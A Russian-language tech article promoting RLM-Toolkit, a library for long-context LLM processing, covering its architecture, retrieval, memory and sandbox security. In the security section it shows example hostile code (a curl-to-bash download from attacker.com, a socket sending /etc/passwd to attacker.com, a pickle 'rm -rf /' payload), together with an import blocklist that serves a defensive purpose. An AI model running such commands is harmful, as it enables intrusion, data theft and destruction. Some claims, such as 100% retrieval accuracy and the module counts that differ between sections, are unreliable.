От теории до production — архитектура, алгоритмы, безопасность
Привет, Хабр!
Это исчерпывающее руководство по RLM-Toolkit — open-source библиотеке для работы с контекстами произвольной длины.
Что рассмотрю:
Формальная теория RLM (State Machine, рекурсия)
InfiniRetri: математика attention-based retrieval
H-MEM: когнитивная архитектура памяти
RAG vs KAG vs GraphRAG vs InfiniRetri
Security: CIRCLE compliance, sandbox escape prevention
Реальные примеры с логами выполнения
Troubleshooting и best practices
Уровень: от middle до PhD-level исследований.
? v1.0.1 вышел вчера — уже 200+ уникальных скачиваний за неполные сутки!
pip install rlm-toolkit
В roadmap: интеграция с NVIDIA KVzap для hardware-accelerated KV-cache compression.
|
Модель |
Контекст |
Effective |
Decay λ |
Источник |
|---|---|---|---|---|
|
GPT-4o |
128K |
~80K |
0.012 |
OpenAI |
|
GPT-OSS-120B |
128K |
~100K |
0.010 |
OpenAI |
|
Claude Sonnet 4.5 |
200K |
~150K |
0.010 |
Anthropic |
|
Claude Opus 4.5 |
200K |
~180K |
0.008 |
Anthropic |
|
Gemini 3 Pro |
2M |
~1.5M |
0.003 |
|
|
Gemini 3 Flash |
1M |
~800K |
0.004 |
|
|
Llama 4 Scout |
10M |
~8M |
0.001 |
Meta |
|
Qwen3-235B |
128K |
~100K |
0.011 |
Alibaba |
Quality(c) = Q₀ × e^(-λc) + ε
где:
Q₀ = базовое качество модели (при c → 0)
λ = коэффициент деградации (model-specific)
c = длина контекста в токенах
ε = шум (hallucinations baseline)
Почему экспоненциальная? Attention в трансформерах масштабируется как O(n²). При росте контекста:
Attention weights размазываются по большему числу токенов
Важная информация "тонет" в массе
Positional encoding теряет точность на дальних позициях
Тесты на OOLONG-Pairs (arxiv:2512.24601):
|
Контекст |
NIAH (простая) |
OOLONG-Pairs (сложная) |
|---|---|---|
|
8K |
98% |
72% |
|
32K |
97% |
58% |
|
128K |
95% |
31% |
|
512K |
91% |
8% |
|
1M |
89% |
<0.1% ? |
OOLONG-Pairs — задача сравнения пар сущностей, разбросанных по документу. Требует глобального понимания, а не локального поиска.
Chunking:
chunks = split(document, size=100_000)
results = [llm.analyze(chunk) for chunk in chunks]
final = merge(results)
# ❌ ПРОБЛЕМА: cross-chunk references потеряны
# Если факт A в chunk 1, а факт B в chunk 5 — связь не найдена
Summarization:
summary = llm.summarize(document) # 10M → 10K
answer = llm.query(summary, question)
# ❌ ПРОБЛЕМА: детали потеряны безвозвратно
# "В договоре 847 пунктов" → "Подробный договор"
RAG:
relevant = vectordb.search(query, k=10)
answer = llm.generate(query, relevant)
# ❌ ПРОБЛЕМА: semantic similarity ≠ relevance
# "Найди противоречия" — какой embedding искать?
«Длинные промпты не должны загружаться в нейросеть напрямую. Они должны быть частью окружения, с которым LLM взаимодействует символически»
— Zhang, Kraska, Khattab (arxiv:2512.24601)
┌────────────────────────────────────────────────────────────────┐
│ RLM ARCHITECTURE │
├────────────────────────────────────────────────────────────────┤
│ │
│ ┌──────────────────────────────────────────────────────────┐ │
│ │ INPUT LAYER │ │
│ │ context = "10M tokens..." query = "Find bugs" │ │
│ └──────────────────────────────────────────────────────────┘ │
│ ↓ │
│ ┌──────────────────────────────────────────────────────────┐ │
│ │ REPL ENVIRONMENT (Python) │ │
│ │ Variables: {context, vars, history} │ │
│ │ Functions: {llm_query, FINAL, FINAL_VAR} │ │
│ └──────────────────────────────────────────────────────────┘ │
│ ↓ │
│ ┌──────────────────────────────────────────────────────────┐ │
│ │ ROOT LLM (Controller) │ │
│ │ Generates Python code to analyze context │ │
│ │ Makes decisions about sub-calls │ │
│ └──────────────────────────────────────────────────────────┘ │
│ ↓ ↓ │
│ ┌─────────────────┐ ┌─────────────────────────┐ │
│ │ CODE EXECUTOR │ │ SUB-LLM CALLS │ │
│ │ (Sandboxed) │ │ llm_query(prompt) │ │
│ │ AST validation │ │ depth++, budget-- │ │
│ └─────────────────┘ └─────────────────────────┘ │
│ ↓ ↓ │
│ ┌──────────────────────────────────────────────────────────┐ │
│ │ STATE UPDATE │ │
│ │ vars.update(new_vars) │ │
│ │ history.append(output) │ │
│ └──────────────────────────────────────────────────────────┘ │
│ ↓ │
│ FINAL(answer) → OUTPUT │
│ │
└────────────────────────────────────────────────────────────────┘
Определение 1. Recursive Language Model (RLM) — это кортеж (L, E, R, S, δ, F) где:
L : Language Model (root LLM)
E : Execution Environment (Python REPL)
R : Recursive mechanism (llm_query function)
S : State space = {context, vars, history, depth, cost}
δ : Transition function S × Action → S
F : Termination predicate (FINAL detected)
State = (context: str, vars: Dict, history: List, depth: int, cost: float)
Actions:
- CODE(c) : Execute code c, update vars
- QUERY(p) : Call sub-LLM with prompt p, depth++
- FINAL(x) : Terminate with output x
- FINAL_VAR(v): Terminate with vars[v]
Transitions:
S₀ = (P, {}, [], 0, 0.0) # Initial state
δ(S, CODE(c)):
output = execute(c, S.vars)
return S with {
vars = S.vars ∪ new_vars(output),
history = S.history + [output]
}
δ(S, QUERY(p)):
result = sub_llm.generate(p)
return S with {
vars = S.vars ∪ {"last_query": result},
history = S.history + [result],
depth = S.depth + 1,
cost = S.cost + query_cost(p, result)
}
δ(S, FINAL(x)):
HALT with output x
Context Never Loaded: context существует как переменная, но никогда не подаётся в LLM целиком
Depth Bounded: depth ≤ max_depth (обычно 2-3)
Cost Bounded: cost ≤ max_cost (бюджет в USD)
Termination Guaranteed: Либо FINAL, либо max_iterations
# Query: "Найди все SQL-инъекции в коде"
# Iteration 1: Root LLM generates code
"""
sections = context.split("\\n\\n# FILE:")
print(f"Found {len(sections)} files")
sql_patterns = ["execute(", "cursor.execute", "raw("]
suspicious = []
for i, section in enumerate(sections):
if any(p in section for p in sql_patterns):
suspicious.append(i)
print(f"Suspicious files: {suspicious}")
"""
# Output: "Found 47 files\nSuspicious files: [3, 12, 29, 45]"
# Iteration 2: Deep analysis via sub-LLM
"""
for idx in suspicious[:3]: # Analyze first 3
file_content = sections[idx][:8000] # Truncate for sub-call
analysis = llm_query(f'''
Analyze this code for SQL injection vulnerabilities:
{file_content}
''')
print(f"File {idx}: {analysis}")
"""
# Output: "File 3: VULNERABLE - unsanitized user input at line 42..."
# Iteration 3: Compile results
"""
vulnerabilities = [
{"file": 3, "line": 42, "type": "SQL Injection"},
{"file": 12, "line": 87, "type": "SQL Injection"},
# ...
]
FINAL_VAR(vulnerabilities)
"""
Query: "Найди все упоминания дедлайна"
Vector Search:
1. Embed query → q_vec
2. For each chunk: similarity(q_vec, chunk_vec)
3. Return top-k
ПРОБЛЕМА: "deadline" может быть написан как:
- "крайний срок"
- "до 15 января"
- "не позднее первого квартала"
Vector similarity НЕ ПОНИМАЕТ семантику!
Использовать внутренние attention weights LLM как сигнал релевантности.
LLM уже "знает", на какие токены обращать внимание для ответа на вопрос. Мы просто извлекаем эту информацию.
def infiniretri(context: str, question: str, model: LLM) -> str:
"""
Attention-Based Infinite Context Retrieval
Based on arxiv:2502.12962
"""
# Step 1: Chunk context into segments
segments = chunk(context, size=SEGMENT_SIZE) # e.g., 8K tokens each
# Step 2: Initialize historical context
historical_context = ""
# Step 3: Iterative processing (like human reading)
for segment in segments:
# Combine historical context + current segment
combined = historical_context + segment
# Run model with question to get attention
output, attention_weights = model.forward_with_attention(
prompt=f"Context: {combined}\n\nQuestion: {question}"
)
# Step 4: Attention-based retrieval
# Average attention across layers and heads
avg_attention = attention_weights.mean(dim=[0, 1]) # [seq_len]
# Find tokens with highest attention
top_indices = avg_attention.topk(k=TOP_K).indices
# Step 5: Update historical context
# Keep only high-attention tokens from combined
relevant_tokens = [combined[i] for i in top_indices]
historical_context = "".join(relevant_tokens)
# Step 6: Final answer with preserved context
return model.generate(
f"Context: {historical_context}\n\nQuestion: {question}\n\nAnswer:"
)
Attention Score Aggregation:
A_final = (1/L) × Σ_{l=1}^{L} (1/H) × Σ_{h=1}^{H} A_{l,h}
где:
L = number of layers
H = number of heads per layer
A_{l,h} = attention matrix at layer l, head h
Token Importance Score:
importance(t) = Σ_{q ∈ query_tokens} A_final[q, t]
Токены с высоким importance сохраняются в historical context.
|
Benchmark |
Baseline LLM |
+ RAG |
+ InfiniRetri |
|---|---|---|---|
|
NIAH @1M |
23% |
61% |
100% |
|
LongBench |
31% |
51% |
89% (+288%) |
|
SCrolls |
44% |
58% |
82% |
|
Quality |
29% |
47% |
71% |
from rlm_toolkit.retrieval import InfiniRetriever
# Initialize with small model for efficiency (default: Qwen2.5-0.5B)
retriever = InfiniRetriever(
model_name_or_path="Qwen/Qwen2.5-0.5B-Instruct",
)
# Load massive document
with open("codebase_1m_tokens.txt") as f:
huge_doc = f.read()
# Retrieve with 100% accuracy
answer = retriever.retrieve(
context=huge_doc,
question="В какой функции определён SecurityEngine?"
)
print(answer)
# Output: "SecurityEngine определён в файле engines/base.py,
# функция create_engine() на строке 142"
|
Аспект |
RAG |
KAG |
GraphRAG |
InfiniRetri |
|---|---|---|---|---|
|
Подход |
Vector similarity |
Knowledge Graph |
Community detection |
Attention-based |
|
Индексация |
Embedding + VectorDB |
Entity extraction + Graph |
Summarization + Leiden |
None (runtime) |
|
Время индекса |
Минуты |
Часы |
Часы |
0 |
|
Требования |
Embedding model |
Graph DB + LLM |
LLM + много $$ |
Attention access |
|
Глобальный контекст |
❌ |
✅ |
✅ |
✅ |
|
Точный поиск |
~70% |
~85% |
~80% |
100% |
|
Стоимость |
$ |
$$$ |
$$$$ |
$ |
|
Open Source |
✅ |
✅ |
✅ |
✅ |
┌─────────────────────────────────────────────────────────────────┐
│ DECISION TREE │
├─────────────────────────────────────────────────────────────────┤
│ │
│ Контекст < 50K токенов? │
│ └─ YES → Стандартный RAG (дёшево, просто) │
│ └─ NO ↓ │
│ │
│ Нужны структурированные связи? │
│ └─ YES → KAG (медицина, право, финансы) │
│ └─ NO ↓ │
│ │
│ Нужен глобальный обзор большого корпуса? │
│ └─ YES → GraphRAG (research, due diligence) │
│ └─ NO ↓ │
│ │
│ Критична точность поиска? │
│ └─ YES → InfiniRetri (код, юридика, security) │
│ └─ NO ↓ │
│ │
│ Контекст > 500K токенов? │
│ └─ YES → RLM + InfiniRetri │
│ └─ NO → RAG достаточно │
│ │
└─────────────────────────────────────────────────────────────────┘
RAG + InfiniRetri (Hybrid Retrieval):
from rlm_toolkit.retrieval import HybridRetriever, VectorRetriever, InfiniRetriever
hybrid = HybridRetriever(
retrievers=[
VectorRetriever(model="BAAI/bge-m3", weight=0.3),
InfiniRetriever(model="Qwen/Qwen3-0.6B", weight=0.7),
],
fusion="reciprocal_rank" # RRF fusion
)
# Fast vector pre-filter + precise attention refinement
results = hybrid.retrieve(context, question)
KAG + InfiniRetri (Graph-Enhanced):
from rlm_toolkit.retrieval import KAGRetriever, InfiniRetriever
# Step 1: KAG finds relevant entities
kag = KAGRetriever(graph_db="neo4j://localhost:7687")
entities = kag.query("Все контракты с Газпром")
# Step 2: InfiniRetri finds exact mentions
infini = InfiniRetriever("Qwen/Qwen3-0.6B")
for entity in entities:
details = infini.retrieve(
context=full_document,
question=f"Подробности о {entity.name}"
)
|
Метод |
Индексация |
Query |
Total (100 queries) |
|---|---|---|---|
|
RAG (OpenAI) |
$0.13 |
$0.02 |
$2.13 |
|
KAG (GPT-4o) |
$15.00 |
$0.50 |
$65.00 |
|
GraphRAG |
$50.00 |
$0.10 |
$60.00 |
|
InfiniRetri |
$0.00 |
$0.05 |
$5.00 |
|
RLM + InfiniRetri |
$0.00 |
$0.30 |
$30.00 |
# LangChain ConversationBufferMemory
class BufferMemory:
def __init__(self, max_tokens=4000):
self.buffer = []
self.max_tokens = max_tokens
def add(self, message):
self.buffer.append(message)
# FIFO eviction
while token_count(self.buffer) > self.max_tokens:
self.buffer.pop(0) # ❌ Старое = потеряно навсегда
Проблемы:
FIFO eviction — важное старое удаляется раньше неважного нового
Нет абстракции — "вчера обсуждали Python" и детали на одном уровне
Нет связей — разговоры изолированы
H-MEM основан на Complementary Learning Systems (CLS) theory:
HIPPOCAMPUS (быстрое запоминание)
↓ consolidation
NEOCORTEX (долговременное хранение, абстракции)
4 уровня H-MEM:
┌─────────────────────────────────────────────────────────────────┐
│ LEVEL 3: DOMAIN │
│ "Пользователь — разработчик, интересуется AI Security" │
│ Очень редко меняется, высокая абстракция │
├─────────────────────────────────────────────────────────────────┤
│ LEVEL 2: CATEGORY │
│ "Тема: погода", "Тема: код", "Тема: документация" │
│ Семантические кластеры │
├─────────────────────────────────────────────────────────────────┤
│ LEVEL 1: TRACE │
│ "Обсуждали погоду в Москве и Питере, предпочитает +20°C" │
│ Консолидированные воспоминания │
├─────────────────────────────────────────────────────────────────┤
│ LEVEL 0: EPISODE │
│ "User: какая погода?" "AI: +15°C, облачно" │
│ Сырые взаимодействия │
└─────────────────────────────────────────────────────────────────┘
class HierarchicalMemory:
def consolidate(self):
"""
Memory consolidation: Episodes → Traces → Categories → Domains
"""
# Step 1: Cluster episodes by semantic similarity
episode_embeddings = self.embed(self.episodes)
clusters = HDBSCAN(min_cluster_size=3).fit(episode_embeddings)
# Step 2: Create traces via LLM summarization
for cluster_id in set(clusters.labels_):
if cluster_id == -1: # Noise
continue
cluster_episodes = [
self.episodes[i]
for i, c in enumerate(clusters.labels_)
if c == cluster_id
]
trace = self.llm.summarize(
f"Summarize these interactions:\n{cluster_episodes}"
)
self.traces.append(Trace(
content=trace,
source_episodes=cluster_episodes,
timestamp=now()
))
# Step 3: Cluster traces → categories
if len(self.traces) >= 5:
trace_embeddings = self.embed([t.content for t in self.traces])
trace_clusters = KMeans(n_clusters=min(5, len(self.traces)//3))
for cluster_id in range(trace_clusters.n_clusters):
cluster_traces = [
self.traces[i]
for i, c in enumerate(trace_clusters.labels_)
if c == cluster_id
]
category = self.llm.summarize(
f"What category do these belong to?\n{cluster_traces}"
)
self.categories.append(Category(content=category))
# Step 4: Update domain (rarely)
if len(self.categories) >= 3 and self._should_update_domain():
self.domain = self.llm.generate(
f"Based on categories {self.categories}, "
f"describe the user's overall interests and profile."
)
Что если новая информация противоречит старой?
def add_episode_with_conflict_check(self, new_episode: str):
"""
Check for conflicts and update memories accordingly.
"""
# Find potentially conflicting memories
similar = self.retrieve(new_episode, k=5)
for memory in similar:
conflict = self.llm.check_conflict(
f"Old: {memory.content}\nNew: {new_episode}"
)
if conflict.is_conflict:
if conflict.new_supersedes:
# Update old memory
memory.content = self.llm.merge(
f"Update '{memory.content}' with '{new_episode}'"
)
memory.updated_at = now()
else:
# Flag for human review
self.conflicts.append(Conflict(old=memory, new=new_episode))
self.episodes.append(Episode(content=new_episode))
from rlm_toolkit.memory import SecureHierarchicalMemory
from rlm_toolkit.crypto import AES256GCM
# Create encrypted memory with trust zones
smem = SecureHierarchicalMemory(
agent_id="agent-financial",
trust_zone="confidential",
encryption=AES256GCM(key=os.environ["HMEM_KEY"]),
)
# Add sensitive data (encrypted at rest)
smem.add_episode("Client SSN: 123-45-6789") # Encrypted!
# Other agents cannot access
other_agent = SecureHierarchicalMemory(agent_id="agent-public")
try:
other_agent.retrieve("SSN") # ❌ AccessDenied
except AccessDenied:
pass
# Grant explicit access
smem.grant_access("agent-compliance", "confidential")
compliance_agent = SecureHierarchicalMemory(agent_id="agent-compliance")
compliance_agent.retrieve("SSN") # ✅ Works
LLM сама генерирует задачи → решает их → улучшается. Без размеченных данных, без human feedback.
Основано на:
R-Zero (arxiv:2508.05004) — Challenger-Solver co-evolution
REBASE (arxiv:2512.29379) — Experience replay с scoring
┌─────────────────────────────────────────────────────────────────┐
│ R-ZERO LOOP │
├─────────────────────────────────────────────────────────────────┤
│ │
│ ┌───────────────┐ ┌───────────────┐ │
│ │ CHALLENGER │ ──────→ │ SOLVER │ │
│ │ Generates │ │ Attempts │ │
│ │ hard tasks │ │ to solve │ │
│ └───────────────┘ └───────────────┘ │
│ ↑ │ │
│ │ ↓ │
│ │ ┌───────────────┐ │
│ │ │ VERIFIER │ │
│ │ │ Checks if │ │
│ │ │ correct │ │
│ │ └───────────────┘ │
│ │ │ │
│ │ ┌─────────────┴─────────────┐ │
│ │ ↓ ↓ │
│ │ ┌──────────┐ ┌──────────┐ │
│ │ │ CORRECT │ │ WRONG │ │
│ │ │ +reward │ │ -reward │ │
│ │ └──────────┘ └──────────┘ │
│ │ │ │ │
│ │ └───────────┬───────────────┘ │
│ │ ↓ │
│ │ ┌─────────────────┐ │
│ └───────────── │ EVOLUTION POOL │ │
│ │ Best strategies │ │
│ └─────────────────┘ │
│ │
└─────────────────────────────────────────────────────────────────┘
from rlm_toolkit.evolve import SelfEvolvingRLM, EvolutionStrategy
from rlm_toolkit.providers import OllamaProvider
# Initialize
evolve = SelfEvolvingRLM(
provider=OllamaProvider("llama4-scout:17b"),
strategy=EvolutionStrategy.CHALLENGER_SOLVER,
config={
"challenge_diversity": 0.8, # How different each challenge
"difficulty_ramp": 0.1, # How fast difficulty increases
"memory_size": 1000, # Experience buffer size
}
)
# Single solve with self-refinement
answer = evolve.solve("Докажи, что √2 иррационально")
print(f"Answer: {answer.answer}")
print(f"Confidence: {answer.confidence}")
print(f"Iterations: {answer.iterations}")
# Training loop (improves over time)
metrics = evolve.training_loop(
iterations=100,
domain="math",
difficulty="hard",
save_checkpoint=True,
)
print(f"Initial success rate: {metrics.initial_rate}") # e.g., 65%
print(f"Final success rate: {metrics.final_rate}") # e.g., 89%
print(f"Best strategies: {metrics.top_strategies}")
from rlm_toolkit.evolve import REBASE
rebase = REBASE(
provider=OllamaProvider("llama4-scout:109b"),
scorer="outcome", # Score by final outcome
)
# Collect experiences
for task in tasks:
trajectory = rebase.solve_with_trajectory(task)
rebase.add_experience(trajectory)
# Train on best experiences
improved = rebase.train(
epochs=10,
batch_size=32,
top_k_ratio=0.2, # Use top 20% trajectories
)
# LLM может сгенерировать:
# 1. RCE via subprocess
import subprocess
subprocess.run(["curl", "attacker.com/shell.sh", "|", "bash"])
# 2. Data exfiltration via network
import socket
s = socket.socket()
s.connect(("attacker.com", 4444))
s.send(open("/etc/passwd").read().encode())
# 3. Pickle RCE
import pickle
class Exploit:
def __reduce__(self):
return (os.system, ("rm -rf /",))
pickle.loads(pickle.dumps(Exploit()))
# 4. Builtins escape
eval("__import__('os').system('whoami')")
CIRCLE = Code Injection for RLM via Crafted Linguistic Exploits
Тестирует 7 категорий атак:
Direct code injection
Obfuscated code injection
Indirect injection via context
Memory corruption attempts
Privilege escalation
Data exfiltration
Denial of service
┌─────────────────────────────────────────────────────────────────┐
│ SECURITY LAYERS │
├─────────────────────────────────────────────────────────────────┤
│ │
│ Layer 1: AST STATIC ANALYSIS │
│ ───────────────────────────── │
│ Before execution, parse code to AST and check: │
│ - Import statements against blocklist │
│ - Function calls against dangerous patterns │
│ - Attribute access (__builtins__, __globals__) │
│ │
│ Layer 2: IMPORT BLOCKLIST (38 modules) │
│ ───────────────────────────────────── │
│ os, sys, subprocess, shutil, pathlib, │
│ socket, http, urllib, ftplib, telnetlib, requests, │
│ pickle, shelve, dill, cloudpickle, marshal, │
│ ctypes, cffi, multiprocessing, threading, │
│ code, codeop, pty, tty, termios, │
│ tempfile, glob, fnmatch, webbrowser, platform, │
│ asyncio (subprocess), importlib, builtins │
│ │
│ Layer 3: SANDBOXED EXECUTION │
│ ───────────────────────────── │
│ - Restricted builtins (no eval, exec, compile, open) │
│ - Timeout enforcement (default 30s) │
│ - Memory limit (default 512MB) │
│ - Virtual filesystem with quotas │
│ │
│ Layer 4: OUTPUT SANITIZATION │
│ ───────────────────────────── │
│ - Truncate output to prevent context overflow │
│ - Scan for sensitive data patterns (API keys, passwords) │
│ - Redact before returning to user │
│ │
└─────────────────────────────────────────────────────────────────┘
from rlm_toolkit import RLM, RLMConfig, SecurityConfig
# Maximum security configuration
config = RLMConfig(
security=SecurityConfig(
sandbox=True,
max_execution_time=30.0,
max_memory_mb=512,
blocked_imports="strict", # All 38 modules
allow_network=False,
allow_filesystem=False,
virtual_fs_quota_mb=100,
redact_sensitive=True,
sensitive_patterns=[
r"[A-Za-z0-9]{32}", # API keys
r"password\s*[:=]", # Passwords
r"\d{3}-\d{2}-\d{4}", # SSN
],
)
)
rlm = RLM.from_ollama("llama4-scout:17b", config=config)
# This is now safe
result = rlm.run(untrusted_document, "Analyze this")
================================ test session starts ================================
collected 27 items
tests/security/test_blocked_imports.py::test_os_blocked PASSED
tests/security/test_blocked_imports.py::test_subprocess_blocked PASSED
tests/security/test_blocked_imports.py::test_socket_blocked PASSED
tests/security/test_blocked_imports.py::test_pickle_blocked PASSED
tests/security/test_blocked_imports.py::test_ctypes_blocked PASSED
tests/security/test_sandbox.py::test_timeout_enforcement PASSED
tests/security/test_sandbox.py::test_memory_limit PASSED
tests/security/test_sandbox.py::test_builtins_restricted PASSED
tests/security/test_sandbox.py::test_eval_blocked PASSED
tests/security/test_sandbox.py::test_exec_blocked PASSED
tests/security/test_exfiltration.py::test_network_blocked PASSED
tests/security/test_exfiltration.py::test_file_read_blocked PASSED
tests/security/test_obfuscation.py::test_base64_decode_blocked PASSED
tests/security/test_obfuscation.py::test_hex_decode_blocked PASSED
tests/security/test_obfuscation.py::test_rot13_blocked PASSED
tests/security/test_indirect.py::test_context_injection_blocked PASSED
tests/security/test_indirect.py::test_prompt_injection_detected PASSED
tests/security/test_builtins.py::test_globals_access_blocked PASSED
tests/security/test_builtins.py::test_builtins_access_blocked PASSED
tests/security/test_builtins.py::test_subclasses_blocked PASSED
tests/security/test_vfs.py::test_quota_enforcement PASSED
tests/security/test_vfs.py::test_path_traversal_blocked PASSED
tests/security/test_redaction.py::test_api_key_redacted PASSED
tests/security/test_redaction.py::test_password_redacted PASSED
tests/security/test_redaction.py::test_ssn_redacted PASSED
tests/security/test_circle.py::test_circle_benchmark_passed PASSED
tests/security/test_circle.py::test_all_attack_categories_blocked PASSED
================================ 27 passed in 12.34s ================================
|
Category |
Providers |
|---|---|
|
Cloud API |
OpenAI, Anthropic, Google, Mistral, Cohere, AI21 |
|
Inference API |
Together, Fireworks, Groq, Hyperbolic, Anyscale |
|
Local |
Ollama, vLLM, llama.cpp, LM Studio, LocalAI |
|
Enterprise |
Azure OpenAI, AWS Bedrock, GCP Vertex AI |
|
Provider |
Model |
Context |
Code Gen |
Speed |
Cost/1M tok |
|---|---|---|---|---|---|
|
OpenAI |
GPT-4o |
128K |
⭐⭐⭐⭐ |
Fast |
$5 |
|
OpenAI |
GPT-OSS-120B |
128K |
⭐⭐⭐⭐ |
Fast |
$3 |
|
Anthropic |
Claude Opus 4.5 |
200K |
⭐⭐⭐⭐⭐ |
Medium |
$15 |
|
Anthropic |
Claude Sonnet 4.5 |
200K |
⭐⭐⭐⭐⭐ |
Fast |
$3 |
|
|
Gemini 3 Pro |
2M |
⭐⭐⭐⭐ |
Fast |
$1.25 |
|
|
Gemini 3 Flash |
1M |
⭐⭐⭐⭐ |
Very Fast |
$0.08 |
|
Meta |
Llama 4 Scout |
10M |
⭐⭐⭐⭐ |
Varies |
Free |
|
Alibaba |
Qwen3-235B |
128K |
⭐⭐⭐⭐ |
Fast |
$0.50 |
|
Mistral |
Large 3 |
128K |
⭐⭐⭐⭐ |
Fast |
$2 |
? Budget-First:
from rlm_toolkit import RLM, RLMConfig
# Use factory methods for easy setup
rlm = RLM.from_ollama("llama4-scout") # 100% free local
# Cost: $0 per 10M token analysis
? Quality-First:
# Claude for best code generation
rlm = RLM.from_anthropic(
root_model="claude-opus-4.5",
sub_model="claude-haiku",
)
# Cost: ~$8 per 10M token analysis
? Privacy-First (100% Local):
rlm = RLM(
root=OllamaProvider("llama4-scout:109b"), # 10M native context!
sub=OllamaProvider("qwen3:7b"), # Fast inference
)
# Cost: $0 + electricity (~$0.50)
⚡ Speed-First:
# OpenAI is fastest cloud option
rlm = RLM.from_openai(
root_model="gpt-4o",
sub_model="gpt-4o-mini",
)
# Speed: ~2 min for 10M tokens
import os
import time
from rlm_toolkit import RLM, RLMConfig, SecurityConfig
from rlm_toolkit.memory import HierarchicalMemory
from rlm_toolkit.observability import ConsoleTracer
# Configuration
config = RLMConfig(
max_iterations=50,
max_cost=5.0,
use_infiniretri=True,
infiniretri_threshold=100_000,
security=SecurityConfig(sandbox=True),
)
# Memory and tracing
memory = HierarchicalMemory()
tracer = ConsoleTracer(verbose=True)
# Initialize RLM
rlm = RLM.from_ollama(
model="llama4-scout:109b",
config=config,
memory=memory,
tracer=tracer,
)
# Load repository
def load_repo(path: str) -> str:
content = []
for root, dirs, files in os.walk(path):
# Skip hidden and common excludes
dirs[:] = [d for d in dirs if not d.startswith('.') and d not in ['node_modules', '__pycache__', 'venv']]
for f in files:
if f.endswith(('.py', '.js', '.ts', '.go', '.rs')):
filepath = os.path.join(root, f)
try:
with open(filepath, encoding='utf-8') as fp:
content.append(f"\n\n# === FILE: {filepath} ===\n{fp.read()}")
except:
pass
return "".join(content)
codebase = load_repo("./my_project")
print(f"Loaded {len(codebase):,} characters ({len(codebase)//4:,} tokens)")
# Run analysis
start = time.time()
result = rlm.run(
context=codebase,
query="""
Проведи полный security audit кодовой базы:
1. SQL/NoSQL инъекции
2. XSS уязвимости
3. SSRF
4. Hardcoded secrets
5. Небезопасная десериализация
6. Path traversal
7. Проблемы с аутентификацией/авторизацией
8. Race conditions
Для каждой найденной уязвимости укажи:
- Файл и строку
- Тип уязвимости
- Severity (Critical/High/Medium/Low)
- Рекомендацию по исправлению
""",
)
elapsed = time.time() - start
print("\n" + "="*60)
print("РЕЗУЛЬТАТ:")
print("="*60)
print(result.answer)
print(f"\nВремя: {elapsed:.1f}s")
print(f"Итераций: {result.iterations}")
print(f"Sub-calls: {result.subcalls}")
print(f"Стоимость: ${result.cost:.2f}")
[RLM] Starting analysis...
[RLM] Context size: 2,847,293 chars (711,823 tokens)
[RLM] Using InfiniRetri (threshold exceeded)
[Iter 1] Root LLM generating code...
>>> files = context.split("# === FILE:")
>>> print(f"Repository contains {len(files)} files")
Output: Repository contains 127 files
[Iter 2] Root LLM generating code...
>>> security_patterns = {
... "sql_injection": [r"execute\(.*%s", r"\.format\(.*\)", r"f\".*SELECT"],
... "xss": [r"innerHTML\s*=", r"\.html\(.*\+"],
... "secrets": [r"password\s*=\s*[\"']", r"api_key\s*=", r"secret\s*="],
... }
>>> import re
>>> findings = []
>>> for i, file in enumerate(files[1:], 1):
... for vuln_type, patterns in security_patterns.items():
... for pattern in patterns:
... if re.search(pattern, file):
... findings.append((i, vuln_type, pattern))
>>> print(f"Found {len(findings)} potential issues")
Output: Found 23 potential issues
[Iter 3] Sub-LLM call for deep analysis...
>>> for file_idx, vuln_type, _ in findings[:5]:
... file_content = files[file_idx][:6000]
... analysis = llm_query(f"Analyze for {vuln_type}:\n{file_content}")
... print(f"File {file_idx}: {analysis[:200]}")
[SUB-CALL 1/5] Analyzing file 3...
[SUB-CALL 2/5] Analyzing file 7...
[SUB-CALL 3/5] Analyzing file 12...
[SUB-CALL 4/5] Analyzing file 19...
[SUB-CALL 5/5] Analyzing file 24...
...
[Iter 8] Compiling final report...
>>> vulnerabilities = [
... {"file": "api/users.py", "line": 42, "type": "SQL Injection",
... "severity": "Critical", "code": "cursor.execute(f'SELECT * FROM users WHERE id={user_id}')"},
... {"file": "utils/auth.py", "line": 87, "type": "Hardcoded Secret",
... "severity": "High", "code": "API_KEY = 'sk-abc123...'"},
... ...
... ]
>>> FINAL_VAR(vulnerabilities)
============================================================
РЕЗУЛЬТАТ:
============================================================
[
{
"file": "api/users.py",
"line": 42,
"type": "SQL Injection",
"severity": "Critical",
"description": "User input directly interpolated into SQL query",
"recommendation": "Use parameterized queries: cursor.execute('SELECT * FROM users WHERE id=%s', (user_id,))"
},
{
"file": "utils/auth.py",
"line": 87,
"type": "Hardcoded Secret",
"severity": "High",
"description": "API key hardcoded in source code",
"recommendation": "Move to environment variable: os.environ.get('API_KEY')"
},
...
]
Время: 127.3s
Итераций: 8
Sub-calls: 12
Стоимость: $0.00 (local model)
|
Проблема |
Причина |
Решение |
|---|---|---|
|
|
LLM не может найти ответ |
Увеличить |
|
|
Слишком много sub-calls |
Ограничить |
|
|
Код выполняется слишком долго |
Увеличить |
|
|
Импорт заблокирован security |
Добавить в whitelist если безопасно |
|
|
OOM на маленькой модели |
Использовать меньший |
from rlm_toolkit import RLM
from rlm_toolkit.observability import ConsoleTracer, FileTracer
# Console tracing (development)
rlm = RLM.from_ollama("llama4-scout:17b", tracer=ConsoleTracer(verbose=True))
# File tracing (production)
rlm = RLM.from_ollama("llama4-scout:17b", tracer=FileTracer("./logs/rlm.log"))
# View execution history
result = rlm.run(context, query)
for step in result.trace:
print(f"[{step.type}] {step.content[:100]}...")
# 1. Use smaller model for sub-calls
rlm = RLM(
root=OllamaProvider("llama4-scout:109b"), # Smart for planning
sub=OllamaProvider("qwen3:7b"), # Fast for details
)
# 2. Enable caching
from rlm_toolkit.cache import DiskCache
rlm = RLM.from_ollama("llama4-scout:17b", cache=DiskCache("./cache"))
# 3. Parallel sub-calls (experimental)
config = RLMConfig(parallel_subcalls=True, max_parallel=4)
|
Компонент |
Описание |
Источник |
|---|---|---|
|
RLM Core |
Recursive Language Models |
arxiv:2512.24601 |
|
InfiniRetri |
Attention-based infinite retrieval |
arxiv:2502.12962 |
|
H-MEM |
Hierarchical memory |
arxiv:2507.XXXXX |
|
R-Zero |
Self-evolving LLMs |
arxiv:2508.05004 |
|
REBASE |
Experience replay |
arxiv:2512.29379 |
|
CIRCLE |
Security benchmark |
arxiv:2507.19399 |
10M+ токенов без деградации качества
100% точность на Needle-in-Haystack
4-уровневая память вместо простого буфера
Блокировка 28 опасных модулей — production-ready security
75+ провайдеров включая 100% локальные варианты
GitHub: github.com/DmitrL-dev/AISecurity/tree/main/rlm-toolkit
Документация: docs
pip install rlm-toolkit
# С полным набором интеграций
pip install rlm-toolkit[all]
